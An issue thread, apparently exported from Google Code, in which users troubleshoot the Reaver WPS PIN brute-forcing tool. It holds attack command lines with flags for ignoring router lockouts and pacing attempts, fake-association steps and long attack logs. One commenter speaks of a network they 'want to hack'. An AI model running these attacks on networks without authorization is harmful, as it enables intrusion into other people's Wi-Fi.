JianliZh429 / reaver-wps

Automatically exported from code.google.com/p/reaver-wps

error 0x02 cyclic #415

Open GoogleCodeExporter opened 8 years ago

GoogleCodeExporter commented 8 years ago

0. What version of Reaver are you using?  (Only defects against the latest
version will be considered.)

Reaver 1.4

1. What operating system are you using (Linux is the only supported OS)?

Backtrack 5 R3

2. Is your wireless card in monitor mode (yes/no)?

yes

3. What is the signal strength of the Access Point you are trying to crack?
-49. I am near the router.
4. What is the manufacturer and model # of the device you are trying to
crack?

AW4062

5. What is the entire command line string you are supplying to reaver?

reaver -i mon0 -b 00:19:15:D7:39:6A -e WLAN_396A -vv

6. Please describe what you think the issue is.

I'm trying to run reaver against my router, but I always get error 0x02.

7. Paste the output from Reaver below.
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[!] WARNING: 25 successive start failures
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[!] WARNING: Failed to associate with 00:19:15:D7:39:6A (ESSID: WLAN_396A)
...................
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
......
[!] WARNING: Receive timeout occurred
[!] WARNING: 25 successive start failures
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Nothing done, nothing to save.
[+] 0.00% complete @ 2012-10-03 19:31:05 (0 seconds/pin)
[+] Trying pin 12345670
[!] WARNING: Failed to associate with 00:19:15:D7:39:6A (ESSID: WLAN_396A)
[!] WARNING: Failed to associate with 00:19:15:D7:39:6A (ESSID: WLAN_396A)
.................

=====================================

sudo ./walsh -i mon0 --ignore-fcs
Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
<cheffner@tacnetsol.com>

BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------------------------------
00:19:15:D7:39:6A       1            -49        1.0               No                WLAN_396A
F4:3E:61:A0:87:2F       2            -47        1.0               No

The TCPDUMP is:
http://www.sendspace.com/file/9hmg3s

Many thanks and sorry for my English!

Original issue reported on code.google.com by davidtuti on 3 Oct 2012 at 11:51

GoogleCodeExporter commented 8 years ago
Try authenticating separately in a 2nd terminal:
aireplay-ng mon0 -1 5 -a <mac> -e <bssid>
reaver -i mon0 -a -b <mac> -c <channel> -vv --no-nacks --win7
In a 3rd terminal:
airodump mon0 -d <mac> -c <channel>
See if authentication is successful.

Original comment by deltomaf...@gmail.com on 4 Oct 2012 at 2:28

GoogleCodeExporter commented 8 years ago
Many thanks for your answer. I can associate it but I have the same 0x02 error:

[+] Switching mon0 to channel 1
[+] Waiting for beacon from 00:19:15:D7:39:6A
[+] Associated with 00:19:15:D7:39:6A (ESSID: WLAN_396A)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
...............
[!] WARNING: 25 successive start failures
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
........................
[!] WARNING: 25 successive start failures
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
.......................

Original comment by davidtuti on 4 Oct 2012 at 3:37

GoogleCodeExporter commented 8 years ago
Is it authenticating in the terminal that has aireplay-ng mon0 -1 5 -a <mac> -e <bssid>?

Original comment by deltomaf...@gmail.com on 5 Oct 2012 at 8:48

GoogleCodeExporter commented 8 years ago
Yes.
It gives me:

15:12:31  Sending Authentication Request (Open System) [ACK]
15:12:31  Authentication successful
15:12:31  Sending Association Request [ACK]
15:12:31  Association successful :-) (AID: 1)

15:12:36  Sending Authentication Request (Open System) [ACK]
15:12:36  Authentication successful
15:12:36  Sending Association Request [ACK]
15:12:40  Got a deauthentication packet! (Waiting 3 seconds)

15:12:43  Sending Authentication Request (Open System) [ACK]
15:12:43  Authentication successful
15:12:43  Sending Association Request [ACK]
15:12:43  Association successful :-) (AID: 1)

15:12:48  Sending Authentication Request (Open System) [ACK]
15:12:48  Authentication successful
15:12:48  Sending Association Request [ACK]
15:12:48  Association successful :-) (AID: 1)

15:12:53  Sending Authentication Request (Open System) [ACK]
15:12:53  Authentication successful
15:12:53  Sending Association Request [ACK]
15:12:53  Association successful :-) (AID: 1)

 CH  1 ][ Elapsed: 37 mins ][ 2012-10-06 15:46 ][ Decloak: 00:19:15:D7:39:6A

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:19:15:D7:39:6A  -36  56    21831     3987    0   1  54   WPA  TKIP   PSK  WLAN_396A

Original comment by davidtuti on 6 Oct 2012 at 1:46

GoogleCodeExporter commented 8 years ago
Try:
aireplay-ng -9 mon0
See if injection is working for the router.

Original comment by deltomaf...@gmail.com on 8 Oct 2012 at 6:57

GoogleCodeExporter commented 8 years ago
Thanks.
It tells me:
root@bt:~# aireplay-ng -9 mon0
22:24:57  Trying broadcast probe requests...
22:24:57  Injection is working!
22:24:59  Found 3 APs

22:24:59  Trying directed probe requests...
22:24:59  2C:B0:5D:D5:97:7F - channel: 1 - 'ONO977F'
22:25:00  Ping (min/avg/max): 2.635ms/16.090ms/62.356ms Power: -78.85
22:25:00  26/30:  86%

22:25:00  00:19:15:D7:39:6A - channel: 1 - 'WLAN_396A'
22:25:00  Ping (min/avg/max): 2.981ms/7.227ms/14.970ms Power: -31.07
22:25:00  30/30: 100%

22:25:00  F4:3E:61:A0:87:2F - channel: 2 - 'WLAN_872E'
22:25:01  Ping (min/avg/max): 2.140ms/5.637ms/16.354ms Power: -54.71
22:25:01  28/30:  93%

Original comment by davidtuti on 8 Oct 2012 at 8:25

GoogleCodeExporter commented 8 years ago
That's strange, it is injecting...
Try this:
reaver -i mon0 -b <mac> -a -S -N -c <channel> -vv 

Original comment by deltomaf...@gmail.com on 11 Oct 2012 at 3:23

GoogleCodeExporter commented 8 years ago
Nothing,
Same error :-(

reaver -i mon0 -b 00:19:15:D7:39:6A -a -S -N -c 13 -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
<cheffner@tacnetsol.com>

[+] Switching mon0 to channel 13
[+] Waiting for beacon from 00:19:15:D7:39:6A
[+] Associated with 00:19:15:D7:39:6A (ESSID: WLAN_396A)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[!] WARNING: 25 successive start failures
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request

Original comment by davidtuti on 11 Oct 2012 at 10:21

GoogleCodeExporter commented 8 years ago
This is a problem with Reaver.  I have had similar issues.

http://code.google.com/p/reaver-wps/issues/detail?id=406#c6

Original comment by keyfo...@veryrealemail.com on 12 Oct 2012 at 8:36

GoogleCodeExporter commented 8 years ago
So it is a bug, no?

Original comment by davidtuti on 12 Oct 2012 at 8:45

GoogleCodeExporter commented 8 years ago
Yes it probably is a bug, but the Reaver project has been abandoned.  Last 
update was 27 March.  If you look through the "issues" list there are many 
other unresolved problems.

I am not sure what will take over from Reaver. I think there was another 
project like it 10 months ago which prompted Reaver's release, I believe.

If you find anything please post back as there are many people waiting for such 
a tool.

Original comment by keyfo...@veryrealemail.com on 13 Oct 2012 at 4:31

GoogleCodeExporter commented 8 years ago
Many thanks.

Original comment by davidtuti on 13 Oct 2012 at 5:08

GoogleCodeExporter commented 8 years ago
Reaver works only if the router has WPS enabled. WPS is some kind of security. 
If the router has WPS disabled, Reaver cannot try any PIN other than 12345670. 
It will loop forever unless the router is yours and you enable the WPS 
feature.

Original comment by zizoe...@gmail.com on 21 Oct 2012 at 2:11

GoogleCodeExporter commented 8 years ago
WPS is activated. It is my router and I can see that it is activated.

Original comment by davidtuti on 21 Oct 2012 at 6:25

GoogleCodeExporter commented 8 years ago
Could you configure the router with another security type?
Configure it with WEP or another WPA and test Reaver again.

Original comment by deltomaf...@gmail.com on 23 Oct 2012 at 2:17

GoogleCodeExporter commented 8 years ago
After much trial and error with the same issue, I found the following steps 
helpful in getting past this issue (note: I'm using VMware 7.0 with a Ralink USB 
adapter).

1. ifconfig wlan0 down
2. physically unplug the Ralink adapter
3. physically plug in the Ralink adapter
4. airmon-ng start wlan0
5. reaver away with your favorite settings

It seems the issue is caused by the driver interaction and, in my case, VMware. 
Doing this works for me 1/3 of the time to resume to M3 and M4 and actually 
try a new pin.

Best regards,

Dr. Rulo

Original comment by rulo...@gmail.com on 5 Nov 2012 at 5:00

GoogleCodeExporter commented 8 years ago
@Dr. Rulo
Thanks! Took a few tries, but resulted in a successful WPS cracking attempt.

Original comment by disposab...@gmail.com on 7 Nov 2012 at 2:08

GoogleCodeExporter commented 8 years ago
In the end, what commands did you use to get it to work? I'm having the same 
issue. 

Original comment by Mr.Krato...@gmail.com on 19 Dec 2012 at 2:47

GoogleCodeExporter commented 8 years ago
I can't make it work.
Sorry.

Original comment by davidtuti on 19 Dec 2012 at 6:25

GoogleCodeExporter commented 8 years ago
Different routers have different timeout settings. They tend to be 5 secs, 15 
secs, and some up to 60 secs.
This sometimes works, but you may find it works for a while and then you get the 
0x02 error part way through the process:

reaver -i mon0 -c 11 -b 00:01:02:03:04:05 -vv -S -N -L -d 15 -r 3:15 -T .5 -x 360

Original comment by JUSTICEN...@googlemail.com on 20 Dec 2012 at 5:08

GoogleCodeExporter commented 8 years ago
"-i mon0" Obviously you'll need to specify the interface.

"-c 11" I find that specifying the channel stops reaver from needlessly channel 
surfing; in this example I used channel 11.

"-b 00:01:02:03:04:05" This is the bssid, which is another required argument in 
reaver.

"-vv" This is the verbose option. Unlike the original verbose (i.e. "-v") this 
option provides twice the original verbosity. I honestly prefer the "-v" option, 
since I rarely run into errors as of late.

"-S" This option instructs reaver to use small Diffie-Hellman secret numbers. 
These are pins that are common to most manufacturers of routers. In Switzerland 
for example, nearly all of the routers use the same standard WPS pin number and 
this option checks for these kinds of pins.

"-N" This is the "no nacks" option. It's one less packet to capture and can 
shorten the time it takes to crack the network.

"-L" This option ignores locks.

"-d 15" This is the delay time between pin attempts. Most routers like 15 
seconds, but some are fine with 5 seconds and I've had one as high as 60 
seconds.

"-r 3:15" This says that after 3 attempts sleep for 15 seconds. This lets the 
router cool off for a bit between attacks.

"-T .5" This is the timeout period for receiving the M5 and M7 response 
message. The default timeout is 0.1 seconds. I find that using .5 seconds is 
sometimes preferred by some routers. You can set this option to as high as 1 
second.

Original comment by JUSTICEN...@googlemail.com on 20 Dec 2012 at 5:08

GoogleCodeExporter commented 8 years ago
Remember to kill processes you may have been using, such as aireplay.
If you're using an Alfa card, set it to max power (30dbi).
Ensure you're close to the router.
You might not need to use the -c command (i.e. channel), so just delete that.
This usually takes 10 to 24+ hrs, so have patience.

Original comment by JUSTICEN...@googlemail.com on 20 Dec 2012 at 9:44

GoogleCodeExporter commented 8 years ago
working fine with -S -N -L -d 15 -r 3:15 -T .5 -x 360...

TKS!

Original comment by javierho...@gmail.com on 30 Jun 2013 at 10:27

GoogleCodeExporter commented 8 years ago
Hello everyone.
I have found a solution to this EAPOL start request loop problem that worked for me.

After a lot of investigation, I found that the EAPOL start loop starts when we 
get a deauthentication packet from the AP even after successful association. So 
whenever I get the loop, I just associate again in a separate terminal using 
aireplay-ng by one packet only, and after that, the normal working of reaver 
starts without any EAPOL stuck loop. Also, you should slow down reaver a bit by 
setting -d 2 or -d 3 or whatever works for you. For any problem you can email 
me: sushobhit333@gmail.com

Original comment by Sushobhi...@gmail.com on 4 Sep 2013 at 7:52

GoogleCodeExporter commented 8 years ago
1) I don't get any response when I run the "wash -i mon0" command.
2) But when I key in the "reaver" command, I can associate with the wifi (WPA TKIP 
PSK) I want to hack.
3) But it shows me something like below:

[+] Switching mon0 to channel 13
[+] Waiting for beacon from 00:19:15:D7:39:6A
[+] Associated with 00:19:15:D7:39:6A (ESSID: WLAN_396A)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request

Original comment by vc....@hotmail.my on 13 Sep 2013 at 3:09

GoogleCodeExporter commented 8 years ago
First use aireplay-ng to associate with the access point
Then use reaver with the "-A" argument. 
This worked for me! 

Original comment by nikhilve...@gmail.com on 25 Dec 2013 at 3:48